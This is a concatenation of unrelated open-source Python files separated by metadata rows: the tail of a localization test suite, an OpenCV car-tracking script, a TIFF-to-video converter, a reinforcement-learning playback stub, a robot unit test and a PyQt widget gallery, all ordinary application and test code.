    eq_(unicode(_lazy_strings['context']), 'What time is it? (context=1)')
@with_setup(setup, teardown)
def test_ungettext_lazy():
    """Lazy plural strings pick the form matching the count they were
    created with."""
    eq_(unicode(n_lazy_strings['s_nocontext']), 'you found a light!')
    eq_(unicode(n_lazy_strings['p_nocontext']), 'you found a pile of lights!')
    eq_(unicode(n_lazy_strings['s_context']), '%d poodle (context=1)')
    eq_(unicode(n_lazy_strings['p_context']), '%d poodles (context=1)')
def test_add_context():
    # \x04 (EOT) is the separator joining msgctxt and msgid.
    eq_("nacho\x04testo", tower.add_context("nacho", "testo"))
def test_split_context():
    # Without a separator, the context half comes back empty.
    eq_(["", u"testo"], tower.split_context("testo"))
    eq_([u"nacho", u"testo"], tower.split_context("nacho\x04testo"))
def test_activate():
    """activate() loads the locale's catalog so translations apply."""
    tower.deactivate_all()
    tower.activate('xx')
    eq_(_('this is a test'), 'you ran a test!')
    tower.deactivate_all()
def test_activate_with_override_settings_and_django_14():
    # Django 1.4 includes a handy override_settings helper. When you
    # use that, it must not include SETTINGS_MODULE in the settings.
    # This tests that activating a locale doesn't throw an
    # AssertionError because there's no SETTINGS_MODULE in settings.
    if django.VERSION >= (1, 4):
        from django.test.utils import override_settings
        with override_settings():
            tower.deactivate_all()
            tower.activate('xx')
            # String is the same because it couldn't find
            # SETTINGS_MODULE and thus didn't pick up the right .mo
            # files.
            eq_(_('this is a test'), 'this is a test')
            tower.deactivate_all()
def test_cached_activate():
    """
    Make sure the locale is always activated properly, even when we hit a
    cached version.
    """
    tower.deactivate_all()
    # Revisit locales repeatedly so later activations hit tower's cache.
    for locale in ('fr', 'fa', 'fr', 'de', 'fr', 'fa'):
        tower.activate(locale)
        eq_(translation.get_language(), locale)
@with_setup(setup, teardown)
def test_template_simple():
    """{% trans %} blocks translate, with whitespace collapsed."""
    s = '{% trans %}this is a test{% endtrans %}'
    eq_(render(s), 'you ran a test!')
    s = '''{% trans %}
        this
        is
        a
        test
        {% endtrans %}'''
    eq_(render(s), 'you ran a test!')
@with_setup(setup, teardown)
def test_template_substitution():
    """Variables declared on the trans tag substitute into the translation."""
    s = '{% trans user="wenzel" %} Hello {{ user }}{% endtrans %}'
    eq_(render(s), 'Hola wenzel')
    s = '''{% trans user="wenzel" %}
        Hello
        \t\r\n
        {{ user }}
        {% endtrans %}'''
    eq_(render(s), 'Hola wenzel')
@with_setup(setup, teardown)
def test_template_substitution_with_pluralization():
    """count= on the trans tag selects the singular or plural branch."""
    s = '''{% trans count=1 %}
        one light !
        {% pluralize %}
        many lights !
        {% endtrans %}'''
    eq_(render(s), 'you found a light!')
    s = '''{% trans count=8 %}
        one light !
        {% pluralize %}
        many lights !
        {% endtrans %}'''
    eq_(render(s), 'you found a pile of lights!')
@with_setup(setup_yy, teardown)
def test_template_substitution_with_many_plural_forms():
    """The 'yy' locale exposes three plural forms; each count maps to the
    right one."""
    s = '''{% trans count=1 %}
        There is {{ count }} monkey.
        {% pluralize %}
        There are {{ count }} monkeys.
        {% endtrans %}'''
    eq_(render(s), 'Monkey count: 1 (Plural: 0)')
    s = '''{% trans count=3 %}
        There is {{ count }} monkey.
        {% pluralize %}
        There are {{ count }} monkeys.
        {% endtrans %}'''
    eq_(render(s), 'Monkey count: 3 (Plural: 1)')
    s = '''{% trans count=5 %}
        There is {{ count }} monkey.
        {% pluralize %}
        There are {{ count }} monkeys.
        {% endtrans %}'''
    eq_(render(s), 'Monkey count: 5 (Plural: 2)')
@with_setup(setup, teardown)
def test_template_gettext_functions():
    """_, gettext and ngettext are also callable directly in templates."""
    s = '{{ _("yy", "context") }}'
    eq_(render(s), 'yy')
    s = '{{ gettext("yy", "context") }}'
    eq_(render(s), 'yy')
    s = '{{ ngettext("1", "2", 1, "context") }}'
    eq_(render(s), '1')
def test_extract_tower_python():
fileobj = StringIO(TEST_PO_INPUT)
method = 'tower.extract_tower_python'
output = fake_extract_from_dir(filename="filename", fileobj=fileobj,
method=method)
# god help you if these are ever unequal
eq_(TEST_PO_OUTPUT, unicode(create_pofile_from_babel(output)))
def test_extract_tower_template():
fileobj = StringIO(TEST_TEMPLATE_INPUT)
method = 'tower.extract_tower_template'
output = fake_extract_from_dir(filename="filename", fileobj=fileobj,
method=method)
# god help you if these are ever unequal
eq_(TEST_TEMPLATE_OUTPUT, unicode(create_pofile_from_babel(output)))
def test_extract_tower_python_backwards_compatible():
    """Same as test_extract_tower_python, but through the legacy dotted
    path under tower.management.commands.extract."""
    fileobj = StringIO(TEST_PO_INPUT)
    method = 'tower.management.commands.extract.extract_tower_python'
    output = fake_extract_from_dir(filename="filename", fileobj=fileobj,
                                   method=method)
    # god help you if these are ever unequal
    eq_(TEST_PO_OUTPUT, unicode(create_pofile_from_babel(output)))
def test_extract_tower_template_backwards_compatible():
    """Same as test_extract_tower_template, but through the legacy dotted
    path under tower.management.commands.extract."""
    fileobj = StringIO(TEST_TEMPLATE_INPUT)
    method = 'tower.management.commands.extract.extract_tower_template'
    output = fake_extract_from_dir(filename="filename", fileobj=fileobj,
                                   method=method)
    # god help you if these are ever unequal
    eq_(TEST_TEMPLATE_OUTPUT, unicode(create_pofile_from_babel(output)))
# Fixture: Python source fed to the extractor; exercises contexts, plurals,
# extraction comments and lazy strings.
TEST_PO_INPUT = """
# Make sure multiple contexts stay separate
_('fligtar')
_('fligtar', 'atwork')
_('fligtar', 'athome')
# Test regular plural form, no context
ngettext('a fligtar', 'many fligtars', 3)
# Make sure several uses collapses to one
ngettext('a fligtar', 'many fligtars', 1, 'aticecreamshop')
ngettext('a fligtar', 'many fligtars', 3, 'aticecreamshop')
ngettext('a fligtar', 'many fligtars', 5, 'aticecreamshop')
# Test comments
# L10N: Turn up the volume
_('fligtar \n\n\r\t talking')
# Test comments w/ plural and context
# l10n: Turn down the volume
ngettext('fligtar', 'many fligtars', 5, 'aticecreamshop')
# Test lazy strings are extracted
_lazy('a lazy string')
"""
# Fixture: expected PO output for TEST_PO_INPUT (compared byte-for-byte).
TEST_PO_OUTPUT = """\
#: filename:3
msgid "fligtar"
msgstr ""
#: filename:4
msgctxt "atwork"
msgid "fligtar"
msgstr ""
#: filename:5
msgctxt "athome"
msgid "fligtar"
msgstr ""
#: filename:8
msgid "a fligtar"
msgid_plural "many fligtars"
msgstr[0] ""
msgstr[1] ""
#: filename:11
#: filename:12
#: filename:13
msgctxt "aticecreamshop"
msgid "a fligtar"
msgid_plural "many fligtars"
msgstr[0] ""
msgstr[1] ""
#. l10n: Turn down the volume
#: filename:23
msgctxt "aticecreamshop"
msgid "fligtar"
msgid_plural "many fligtars"
msgstr[0] ""
msgstr[1] ""
#: filename:26
msgid "a lazy string"
msgstr ""
"""
TEST_TEMPLATE_INPUT = """
{{ _('sunshine') }}
{{ _('sunshine', 'nothere') }}
{{ _('sunshine', 'outside') }}
{# Regular comment, regular gettext #}
{% trans %}
I like pie.
{% endtrans %}
{# l10N: How many hours? #}
{% trans plural=4, count=4 %}
{{ count }} hour left
{% pluralize %}
{{ count }} hours left
{% endtrans %}
{{ ngettext("one", "many", 5) }}
{# L10n: This string has a hat. #}
{% trans %}
Let me tell you about a string
who spanned
multiple lines.
{% endtrans %}
"""
# Fixture: expected PO output for TEST_TEMPLATE_INPUT (compared
# byte-for-byte).
TEST_TEMPLATE_OUTPUT = """\
#: filename:2
msgid "sunshine"
msgstr ""
#: filename:3
msgctxt "nothere"
msgid "sunshine"
msgstr ""
#: filename:4
msgctxt "outside"
msgid "sunshine"
msgstr ""
#: filename:7
msgid "I like pie."
msgstr ""
#. How many hours?
#: filename:12
msgid "%(count)s hour left"
msgid_plural "%(count)s hours left"
msgstr[0] ""
msgstr[1] ""
#: filename:18
msgid "one"
msgid_plural "many"
msgstr[0] ""
msgstr[1] ""
#. This string has a hat.
#: filename:21
msgid "Let me tell you about a string who spanned multiple lines."
msgstr ""
"""
| clouserw/tower | tower/tests/test_l10n.py | test_l10n.py | py | 11,819 | python | en | code | 34 | github-code | 13 |
44889001224 | import cv2 as cv
import csv
import math
import numpy as np
import scipy.signal
from matplotlib import pyplot as plt
import argparse
from Tracker import Tracker
# Physical side length of the tracked agent (a cube), in centimetres.
# Used together with a user-selected reference box to convert pixels to cm.
agentLength = 10.5 # cm (cube)
def readTrack(opt):
    """Track N cars along a closed track in a video and log the along-track
    distance between consecutive cars.

    Pipeline: load corner points -> perspective-rectify each frame ->
    let the user select a reference box to calibrate pixels-to-cm ->
    initialise one Tracker per car -> per frame, snap each car to the
    nearest track point and integrate the arc length between consecutive
    cars -> write a CSV, animate, and finally plot Butterworth-filtered
    distance curves.

    Interactive: opens OpenCV/matplotlib windows; ESC stops the loop.
    """
    # read CSV file
    N = opt.nCars # number of cars
    positions = [] # for perspective transform
    with open(opt.cornerPoints, "r") as infile:
        reader = csv.reader(infile)
        for row in reader:
            row_float =[float(row[0]), float(row[1])]
            positions.append(row_float)
    # Read video
    vid = cv.VideoCapture(opt.fileName)
    if not vid.isOpened():
        exit(-1)
    fps = vid.get(cv.CAP_PROP_FPS)
    deltaT = 1./fps
    ret, frame = vid.read()
    height, width = frame.shape[:2] # height and width in pixels
    # write CSV file
    myFile = open(opt.outputName, 'w', newline = '')
    writer = csv.writer(myFile)
    firstrow = ['time(s)']
    for i in range(N-1):
        firstrow.append('distance' + str(i+1) + str(i+2) + '(cm)')
    writer.writerow(firstrow)
    del(firstrow) # free memory
    # Perspective transform: map the four marked corners onto an axis-aligned
    # rectangle so distances in the warped image are uniform.
    src = np.float32([positions[0], positions[1], positions[2], positions[3]])
    dst = np.float32([positions[0], [positions[0][0], positions[1][1]], [positions[2][0], positions[0][1]], [positions[2][0], positions[1][1]]])
    M = cv.getPerspectiveTransform(src, dst) # Transformation matrix
    warped_frame = cv.warpPerspective(frame, M, (width, height))
    frame = cv.warpPerspective(frame, M, (width, height))
    # get agent length in pixels: the user draws a box around one cube; its
    # pixel width together with agentLength calibrates the px->cm factor.
    cv.namedWindow('Pixels to centimetres', cv.WINDOW_NORMAL)
    bbox = cv.selectROI('Pixels to centimetres', warped_frame, False)
    length = bbox[2] # pixel
    cv.destroyWindow('Pixels to centimetres')
    # read CSV file
    trackPoints = []
    with open(opt.trackName, "r") as infile:
        reader = csv.reader(infile)
        for row in reader:
            row_float =[float(row[0]), float(row[1])]
            trackPoints.append(row_float)
    # trackPoints_x = [x[0] for x in trackPoints]
    # trackPoints_y = [y[1] for y in trackPoints]
    trackPoints_x_cm = [x[0] * agentLength / length for x in trackPoints]
    trackPoints_y_cm = [y[1] * agentLength / length for y in trackPoints]
    # Static preview figure: the rectified first frame with the track overlay.
    plt.figure(0)
    plt.cla()
    plt.figure(0).patch.set_facecolor('#000000')
    plt.gca().tick_params(axis='x', colors='#ffffff')
    plt.gca().tick_params(axis='y', colors='#ffffff')
    plt.gca().yaxis.label.set_color('#ffffff')
    plt.gca().xaxis.label.set_color('#ffffff')
    plt.gca().set_aspect('equal')
    plt.gca().set_ylim(0, height * agentLength / length)
    plt.gca().set_xlim(0, width * agentLength / length)
    plt.gca().imshow(cv.cvtColor(frame, cv.COLOR_BGR2RGB), extent=[0, width * agentLength / length, 0, height * agentLength / length])
    plt.plot(trackPoints_x_cm, trackPoints_y_cm, color='lime')
    plt.xlabel('(cm)')
    plt.ylabel('(cm)')
    plt.figure(0).tight_layout()
    plt.show()
    # initialise trackers (one interactive ROI selection per car)
    cv.namedWindow('zTracking', cv.WINDOW_AUTOSIZE)
    trackers = []
    for i in range(N):
        trackers.append(Tracker(frame))
    cv.destroyWindow('zTracking')
    firstFrame = True
    seconds = 0.
    timeArr = []
    distancesArr = []
    colours_plot = ['lime', 'magenta', 'yellow', 'cyan', 'green', 'blue', 'red']
    count_frame = 0
    while vid.isOpened():
        ret, frame = vid.read()
        if ret:
            points = []
            frame = cv.warpPerspective(frame, M, (width, height))
            for tracker in trackers:
                if(tracker.update(frame)):
                    tracker.getCoordinates()
                else:
                    print('could not detect object')
                    exit(-1)
                tracker.getCentroid(height)
                points.append(tracker.p)
            # Find closest point in track (brute-force nearest neighbour on
            # squared distances; 10000. is an "infinity" sentinel — assumes
            # the true minimum squared distance is below it).
            pointsInTrack = []
            pointsInTrackPositions = []
            for point in points:
                minDistance = 10000.
                count = 0
                for trackPoint in trackPoints:
                    euclideanDistance2 = (point[0] - trackPoint[0]) ** 2 + (point[1] - trackPoint[1]) ** 2
                    if euclideanDistance2 < minDistance:
                        minDistance = euclideanDistance2
                        minPoint = trackPoint
                        positionInTrack = count
                    count += 1
                pointsInTrack.append(minPoint)
                pointsInTrackPositions.append(positionInTrack)
            # Find non-euclidean distance: sum the polyline segment lengths
            # between the snapped indices of car i and car i+1, wrapping
            # around the track closure when i+1 is "behind" i.
            # NOTE(review): the `- 1` in the first range looks like it drops
            # the final segment before car i+1 — confirm intended.
            distances = []
            distances_cm = []
            temp_distance = 0.0
            for i in range(N - 1):
                if pointsInTrackPositions[i] <= pointsInTrackPositions[i+1]:
                    for k in range(pointsInTrackPositions[i], pointsInTrackPositions[i+1] - 1):
                        temp_distance += math.sqrt((trackPoints[k][0] - trackPoints[k+1][0]) ** 2 + (trackPoints[k][1] - trackPoints[k+1][1]) ** 2)
                else:
                    for k in range(0, pointsInTrackPositions[i+1]):
                        temp_distance += math.sqrt((trackPoints[k][0] - trackPoints[k+1][0]) ** 2 + (trackPoints[k][1] - trackPoints[k+1][1]) ** 2)
                    for k in range(pointsInTrackPositions[i], len(trackPoints) - 1):
                        temp_distance += math.sqrt((trackPoints[k][0] - trackPoints[k+1][0]) ** 2 + (trackPoints[k][1] - trackPoints[k+1][1]) ** 2)
                    # Add discontinuity
                    temp_distance += math.sqrt((trackPoints[0][0] - trackPoints[len(trackPoints) - 1][0]) ** 2 + (trackPoints[0][1] - trackPoints[len(trackPoints) - 1][1]) ** 2)
                distances.append(temp_distance)
                distances_cm.append(temp_distance * agentLength / length)
                # Clean temporal variable before next iteration
                temp_distance = 0.0
            # Plot animation
            plt.figure(1)
            plt.cla()
            plt.gca().set_aspect('equal')
            plt.xlabel('(cm)')
            plt.ylabel('(cm)')
            plt.gca().set_ylim(0, height * agentLength / length)
            plt.gca().set_xlim(0, width * agentLength / length)
            plt.figure(1).tight_layout()
            plt.figure(1).patch.set_facecolor('#000000')
            plt.gca().tick_params(axis='x', colors='#ffffff')
            plt.gca().tick_params(axis='y', colors='#ffffff')
            plt.gca().yaxis.label.set_color('#ffffff')
            plt.gca().xaxis.label.set_color('#ffffff')
            plt.gca().imshow(cv.cvtColor(frame, cv.COLOR_BGR2RGB), extent=[0, width * agentLength / length, 0, height * agentLength / length])
            # FOR distances: draw the track segment between each car pair in
            # its own colour, plus the wrap-around piece when needed.
            for i in range(N-1):
                if pointsInTrackPositions[i] <= pointsInTrackPositions[i+1]:
                    plt.plot(trackPoints_x_cm[pointsInTrackPositions[i]:pointsInTrackPositions[i+1]], trackPoints_y_cm[pointsInTrackPositions[i]:pointsInTrackPositions[i+1]], color=colours_plot[i])
                else:
                    plt.plot(trackPoints_x_cm[0:pointsInTrackPositions[i+1]], trackPoints_y_cm[0:pointsInTrackPositions[i+1]], color=colours_plot[i])
                    plt.plot(trackPoints_x_cm[pointsInTrackPositions[i]:-1], trackPoints_y_cm[pointsInTrackPositions[i]:-1], color=colours_plot[i])
                    # Add discontinuity
                    plt.plot([trackPoints_x_cm[-1], trackPoints_x_cm[0]], [trackPoints_y_cm[-1], trackPoints_y_cm[0]], color=colours_plot[i])
                # plot text
                plt.text((points[i][0] + points[i+1][0])/2. * agentLength / length, (points[i][1] + points[i+1][1])/2. * agentLength / length, str(round(distances_cm[i], 1)), color='white')
            # FOR points
            for i in range(N):
                plt.plot(pointsInTrack[i][0] * agentLength / length, pointsInTrack[i][1] * agentLength / length, 'bo', color='red')
            plt.pause(0.000000001)
            # append into arrays
            timeArr = np.append(timeArr, seconds)
            distancesArr.append(distances_cm)
            # write CSV file
            firstrow = [seconds]
            for i in range(N-1):
                firstrow.append(distances_cm[i])
            writer.writerow(firstrow)
            del(firstrow) # free memory
            seconds += deltaT
            if (opt.writeVideo):
                plt.savefig('frames/'+"{:05n}".format(count_frame)+'.png')
                count_frame += 1
            if cv.waitKey(1) == 27:
                break
        else:
            break
    vid.release()
    plt.show()
    # Butterworth filter: zero-phase smoothing of each distance series.
    b, a = scipy.signal.butter(1, 0.5)
    distancesArr = np.array(distancesArr)
    for i in range(N-1):
        distancesArr[:,i] = scipy.signal.filtfilt(b, a, distancesArr[:,i])
    # Plot
    plt.figure(2)
    for i in range(N-1):
        plt.plot(timeArr, distancesArr[:,i], label='distance {}-{} cm'.format(i+1, i+2))
    plt.xlabel('Time(s)')
    plt.ylabel('Distance(cm)')
    plt.title('Distance vs Time')
    plt.grid(True)
    plt.legend()
    plt.show()
def parse_opt(known=False):
    """Build the CLI for the tracking script and return the parsed options.

    With known=True, unrecognised arguments are silently ignored
    (parse_known_args); otherwise argparse reports an error as usual.
    """
    parser = argparse.ArgumentParser()
    # String-valued options: (flag, default, help text).
    string_options = (
        ('--fileName', "prueba_1.mp4", 'Video containing the experiment'),
        ('--trackName', "trackPoints.csv", 'CSV file containing track coordinates'),
        ('--outputName', "results.csv", 'Results for plotting'),
        ('--cornerPoints', "cornerPoints.csv", 'Track corners used for perspective transform'),
    )
    for flag, default_value, help_text in string_options:
        parser.add_argument(flag, default=default_value, type=str, help=help_text)
    parser.add_argument('--nCars', default=5, type=int, help='Number of cars')
    parser.add_argument('--writeVideo', action='store_true', help='Flag for frame saving')
    if known:
        return parser.parse_known_args()[0]
    return parser.parse_args()
def main(opt):
    # Thin wrapper so the pipeline can be driven programmatically with a
    # pre-built options namespace.
    readTrack(opt)
if __name__ == '__main__':
    # CLI entry point: parse arguments and run the tracking pipeline.
    opt = parse_opt()
    main(opt)
| Zimrahin/zTracking | readTrack.py | readTrack.py | py | 8,656 | python | en | code | 3 | github-code | 13 |
35784868388 | from PIL import Image
import numpy as np
import os
import imageio
import cv2
import sys
sys.path.insert(0, r"add/sensors/folder/to/path")
from config import *
def tiff_to_avi(input_filepath):
    """Convert a (possibly multi-frame) TIFF stack into a viewable file
    next to the input: a .jpeg for a single frame, an .avi otherwise.

    The config section for width/height is chosen from the filename
    prefix ("rgbd..." or "rgb...").
    """
    path = os.path.dirname(input_filepath)
    filename_ext = os.path.basename(input_filepath)
    filename = os.path.splitext(filename_ext)[0]
    # Bug fix: the original sliced `filename[:2]` (two characters, e.g.
    # "rg"), which could never equal "rgb" or "rgbd", so both branches were
    # dead and config.getint() was called with a bogus section name.
    # Match the longer prefix first so "rgbd*" is not misread as "rgb".
    if filename.startswith("rgbd"):
        sensor_type = "rgbd"
    elif filename.startswith("rgb"):
        sensor_type = "rgb"
    else:
        # Preserve the old two-character fallback for any other sensor
        # prefix — TODO confirm the expected config section names.
        sensor_type = filename[:2]
    width = config.getint(sensor_type, "width")
    height = config.getint(sensor_type, "height")
    fps = config.getint("mmhealth", "fps")
    imarray = imageio.volread(input_filepath)
    # Zero out NaN/inf pixels before min-max normalising, then force the
    # same pixels to white in the 8-bit output.
    mask = np.ma.masked_invalid(imarray)
    imarray[mask.mask] = 0.0
    imarray = cv2.normalize(src=imarray, dst=None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
    imarray[mask.mask] = 255.0
    NUM_FRAMES = imarray.shape[0]
    if NUM_FRAMES == 1:
        frame = imarray[0]
        output_filepath = os.path.join(path, filename + ".jpeg")
        imageio.imwrite(output_filepath, frame.astype(np.uint8))
    else:
        output_filepath = os.path.join(path, filename + "_avi.avi")
        imageio.mimwrite(output_filepath, imarray.astype(np.uint8), fps=fps)
    print("Tiff to Avi Conversion: Sensor {} done! Shape: {}".format(sensor_type, imarray.shape))
    cv2.destroyAllWindows()
if __name__ == "__main__":
    # Manual entry point: point this at a TIFF stack to convert in place.
    input_filepath = r"path/to/tiff/file"
tiff_to_avi(input_filepath) | UCLA-VMG/EquiPleth | data_acquisition/postproc/tiff_to_avi.py | tiff_to_avi.py | py | 1,516 | python | en | code | 6 | github-code | 13 |
9543178637 | import gym
from stable_baselines3 import PPO
# Model path (fill these in before running).
model_dir = ""
model_path = ""
# Load in model
model = PPO.load(model_path)
# Forms environment
# NOTE(review): placeholder — `env` must be replaced with a real gym.Env;
# calling .reset() on None raises AttributeError.
env = None
env.reset()
# Run model for show.
# Bug fix: the original set `done = False` and then looped `while done:`,
# so the rollout body could never execute. Loop over episodes instead;
# interrupt with Ctrl-C / by closing the render window.
while True:
    obs = env.reset()
    done = False
    while not done:
        env.render()
        action, _states = model.predict(obs)
obs, reward, done, info = env.step(action) | akingsley319/AI_Plays_DarkSouls | src/EldenRing/ai_plays/engine.py | engine.py | py | 403 | python | en | code | 1 | github-code | 13 |
72753723538 | from mock import patch
from unittest import TestCase
from robotarena.robot import RobotRandom
class TestRobotRandom(TestCase):
  """Tests for RobotRandom.reaction with the RNG stubbed to fixed draws."""

  def __fixed_randint(self, lower_bound, upper_bound):
    # Deterministic stand-in for randint: the (0, 2) draw selects the
    # action type and the (0, 3) draw selects the direction.
    outcomes = {
        (0, 2): 1,  # always return "push"
        (0, 3): 2,  # always return "S"
    }
    return outcomes.get((lower_bound, upper_bound), -1)

  def test_reaction_should_return_empty_action(self):
    robot = RobotRandom("any_name")
    # With the RNG stubbed, the reaction must not depend on arena state,
    # so placeholder values suffice for all three arguments.
    field = robot_location = enemy_location = None
    with patch('robotarena.robot.robot_random.randint', self.__fixed_randint):
      reaction = robot.reaction(field, robot_location, enemy_location)
    self.assertEqual("push", reaction.action_type)
    self.assertEqual("S", reaction.direction)
| LIQRGV/robot-arena | test/robot/test_robot_random.py | test_robot_random.py | py | 958 | python | en | code | 0 | github-code | 13 |
30816467974 | """
Slightly modified version of WidgetGallery to remove
any dynamic changes of the style. All the style elements
are defined by qtmodern in the main.py file.
"""
from PyQt5.QtWidgets import QApplication, QCheckBox, QComboBox , QDateTimeEdit, QDial, QGridLayout, \
QGroupBox, QDialog, QLabel, QLineEdit, QProgressBar, QPushButton, QRadioButton, QSlider, \
QScrollBar, QSpinBox, QStyle, QStyleFactory, QTableWidget, \
QTextEdit, QVBoxLayout, QHBoxLayout, QSizePolicy, QTabWidget, QWidget
from PyQt5.QtCore import Qt, QEvent, QDateTime, QTimer, QT_VERSION_STR
from PyQt5.QtGui import QPalette
class WidgetGallery(QDialog):
    """Demo dialog showcasing common Qt widgets.

    The style/palette combo box and checkbox remain wired up, but their
    slots are deliberately no-ops here — styling is handled externally
    (see the module docstring).
    """
    def __init__(self, parent=None):
        super().__init__(parent)
        self.styleComboBox = QComboBox()
        defaultStyleName = QApplication.style().objectName()
        styleNames = QStyleFactory.keys()
        styleNames.append("NorwegianWood")
        # Move the currently active style to the front of the combo list.
        # NOTE(review): swapItemsAt is a QStringList method; under PyQt5,
        # QStyleFactory.keys() may return a plain list — confirm this call.
        for i in range(1, len(styleNames)):
            if (defaultStyleName == styleNames[i]):
                styleNames.swapItemsAt(0, i)
                break
        self.styleComboBox.addItems(styleNames)
        styleLabel = QLabel(self.tr("&Style (turned off!):")) # check this tr use
        styleLabel.setBuddy(self.styleComboBox)
        self.useStylePaletteCheckBox = QCheckBox(self.tr("&Use style's standard palette"))
        self.useStylePaletteCheckBox.setChecked(True)
        self.disableWidgetsCheckBox = QCheckBox(self.tr("&Disable widgets"))
        self.createTopLeftGroupBox()
        self.createTopRightGroupBox()
        self.createBottomLeftTabWidget()
        self.createBottomRightGroupBox()
        self.createProgressBar()
        # textActivated only exists on newer Qt; fall back to the old
        # activated[str] overload on PyQt 5.12.
        if (QT_VERSION_STR == '5.15.4'):
            self.styleComboBox.textActivated.connect(self.changeStyle)
        else: #support pyqt 5.12
            self.styleComboBox.activated[str].connect(self.changeStyle)
        self.useStylePaletteCheckBox.toggled.connect(self.changePalette)
        self.disableWidgetsCheckBox.toggled.connect(self.topLeftGroupBox.setDisabled)
        self.disableWidgetsCheckBox.toggled.connect(self.topRightGroupBox.setDisabled)
        self.disableWidgetsCheckBox.toggled.connect(self.bottomLeftTabWidget.setDisabled)
        self.disableWidgetsCheckBox.toggled.connect(self.bottomRightGroupBox.setDisabled)
        topLayout = QHBoxLayout()
        topLayout.addWidget(styleLabel)
        topLayout.addWidget(self.styleComboBox)
        topLayout.addStretch(1)
        topLayout.addWidget(self.useStylePaletteCheckBox)
        topLayout.addWidget(self.disableWidgetsCheckBox)
        mainLayout = QGridLayout()
        mainLayout.addLayout(topLayout, 0, 0, 1, 2)
        mainLayout.addWidget(self.topLeftGroupBox, 1, 0)
        mainLayout.addWidget(self.topRightGroupBox, 1, 1)
        mainLayout.addWidget(self.bottomLeftTabWidget, 2, 0)
        mainLayout.addWidget(self.bottomRightGroupBox, 2, 1)
        mainLayout.addWidget(self.progressBar, 3, 0, 1, 2)
        mainLayout.setRowStretch(1, 1)
        mainLayout.setRowStretch(2, 1)
        mainLayout.setColumnStretch(0, 1)
        mainLayout.setColumnStretch(1, 1)
        self.setLayout(mainLayout)
        self.setWindowTitle(self.tr("Styles"))
        self.styleChanged()
    def changeStyle(self, styleName):
        """Intentionally a no-op: the style is fixed externally."""
        pass
    def changePalette(self):
        """Intentionally a no-op: the palette is fixed externally."""
        pass
    def changeEvent(self, event):
        # Keep the combo box in sync if the application style changes
        # from outside this dialog.
        if event.type() == QEvent.StyleChange:
            self.styleChanged()
    def styleChanged(self):
        """Select the combo-box entry matching the active application style."""
        styleName = QApplication.style().objectName()
        for i in range(0, self.styleComboBox.count()):
            if (self.styleComboBox.itemText(i) == styleName):
                self.styleComboBox.setCurrentIndex(i)
                break
        self.changePalette()
    def advanceProgressBar(self):
        # Ease towards the maximum: advance by 1% of the remaining range.
        # NOTE(review): the argument is a float; newer PyQt5 expects an int
        # for setValue — confirm on the targeted Qt version.
        curVal = self.progressBar.value()
        maxVal = self.progressBar.maximum()
        self.progressBar.setValue(curVal + (maxVal - curVal) / 100)
    def createTopLeftGroupBox(self):
        """Group 1: radio buttons plus a tri-state check box."""
        self.topLeftGroupBox = QGroupBox(self.tr("Group 1"))
        radioButton1 = QRadioButton(self.tr("Radio button 1"))
        radioButton2 = QRadioButton(self.tr("Radio button 2"))
        radioButton3 = QRadioButton(self.tr("Radio button 3"))
        radioButton1.setChecked(True)
        checkBox = QCheckBox(self.tr("Tri-state check box"))
        checkBox.setTristate(True)
        checkBox.setCheckState(Qt.PartiallyChecked)
        layout = QVBoxLayout()
        layout.addWidget(radioButton1)
        layout.addWidget(radioButton2)
        layout.addWidget(radioButton3)
        layout.addWidget(checkBox)
        layout.addStretch(1)
        self.topLeftGroupBox.setLayout(layout)
    def createTopRightGroupBox(self):
        """Group 2: default, toggle and flat push-button variants."""
        self.topRightGroupBox = QGroupBox(self.tr("Group 2"))
        defaultPushButton = QPushButton(self.tr("Default Push Button"))
        defaultPushButton.setDefault(True)
        togglePushButton = QPushButton(self.tr("Toggle Push Button"))
        togglePushButton.setCheckable(True)
        togglePushButton.setChecked(True)
        flatPushButton = QPushButton(self.tr("Flat Push Button"))
        flatPushButton.setFlat(True)
        layout = QVBoxLayout()
        layout.addWidget(defaultPushButton)
        layout.addWidget(togglePushButton)
        layout.addWidget(flatPushButton)
        layout.addStretch(1)
        self.topRightGroupBox.setLayout(layout)
    def createBottomLeftTabWidget(self):
        """Tab widget: a 10x10 table on one tab, a text editor on the other."""
        self.bottomLeftTabWidget = QTabWidget()
        self.bottomLeftTabWidget.setSizePolicy(QSizePolicy.Preferred,
                QSizePolicy.Ignored)
        tab1 = QWidget()
        tableWidget = QTableWidget(10, 10)
        tab1hbox = QHBoxLayout()
        tab1hbox.setContentsMargins(5,5, 5, 5)
        tab1hbox.addWidget(tableWidget)
        tab1.setLayout(tab1hbox)
        tab2 = QWidget()
        textEdit = QTextEdit()
        textEdit.setPlainText("Twinkle, twinkle, little star,\n"
                              "How I wonder what you are.\n"
                              "Up above the world so high,\n"
                              "Like a diamond in the sky.\n"
                              "Twinkle, twinkle, little star,\n"
                              "How I wonder what you are!\n")
        tab2hbox = QHBoxLayout()
        tab2hbox.setContentsMargins(5, 5, 5, 5)
        tab2hbox.addWidget(textEdit)
        tab2.setLayout(tab2hbox)
        self.bottomLeftTabWidget.addTab(tab1, self.tr("&Table"))
        self.bottomLeftTabWidget.addTab(tab2, self.tr("Text &Edit"))
    def createBottomRightGroupBox(self):
        """Group 3 (checkable): line edit, spin box, date/time edit,
        slider, scroll bar and dial."""
        self.bottomRightGroupBox = QGroupBox(self.tr("Group 3"))
        self.bottomRightGroupBox.setCheckable(True)
        self.bottomRightGroupBox.setChecked(True)
        lineEdit = QLineEdit("s3cRe7")
        lineEdit.setEchoMode(QLineEdit.Password)
        spinBox = QSpinBox(self.bottomRightGroupBox)
        spinBox.setValue(50)
        dateTimeEdit = QDateTimeEdit(self.bottomRightGroupBox)
        dateTimeEdit.setDateTime(QDateTime.currentDateTime())
        slider = QSlider(Qt.Horizontal, self.bottomRightGroupBox)
        slider.setValue(40)
        scrollBar = QScrollBar(Qt.Horizontal, self.bottomRightGroupBox)
        scrollBar.setValue(60)
        dial = QDial(self.bottomRightGroupBox)
        dial.setValue(30)
        dial.setNotchesVisible(True)
        layout = QGridLayout()
        layout.addWidget(lineEdit, 0, 0, 1, 2)
        layout.addWidget(spinBox, 1, 0, 1, 2)
        layout.addWidget(dateTimeEdit, 2, 0, 1, 2)
        layout.addWidget(slider, 3, 0)
        layout.addWidget(scrollBar, 4, 0)
        layout.addWidget(dial, 3, 1, 2, 1)
        layout.setRowStretch(5, 1)
        self.bottomRightGroupBox.setLayout(layout)
    def createProgressBar(self):
        """Progress bar advanced once per second via advanceProgressBar."""
        self.progressBar = QProgressBar()
        self.progressBar.setRange(0, 10000)
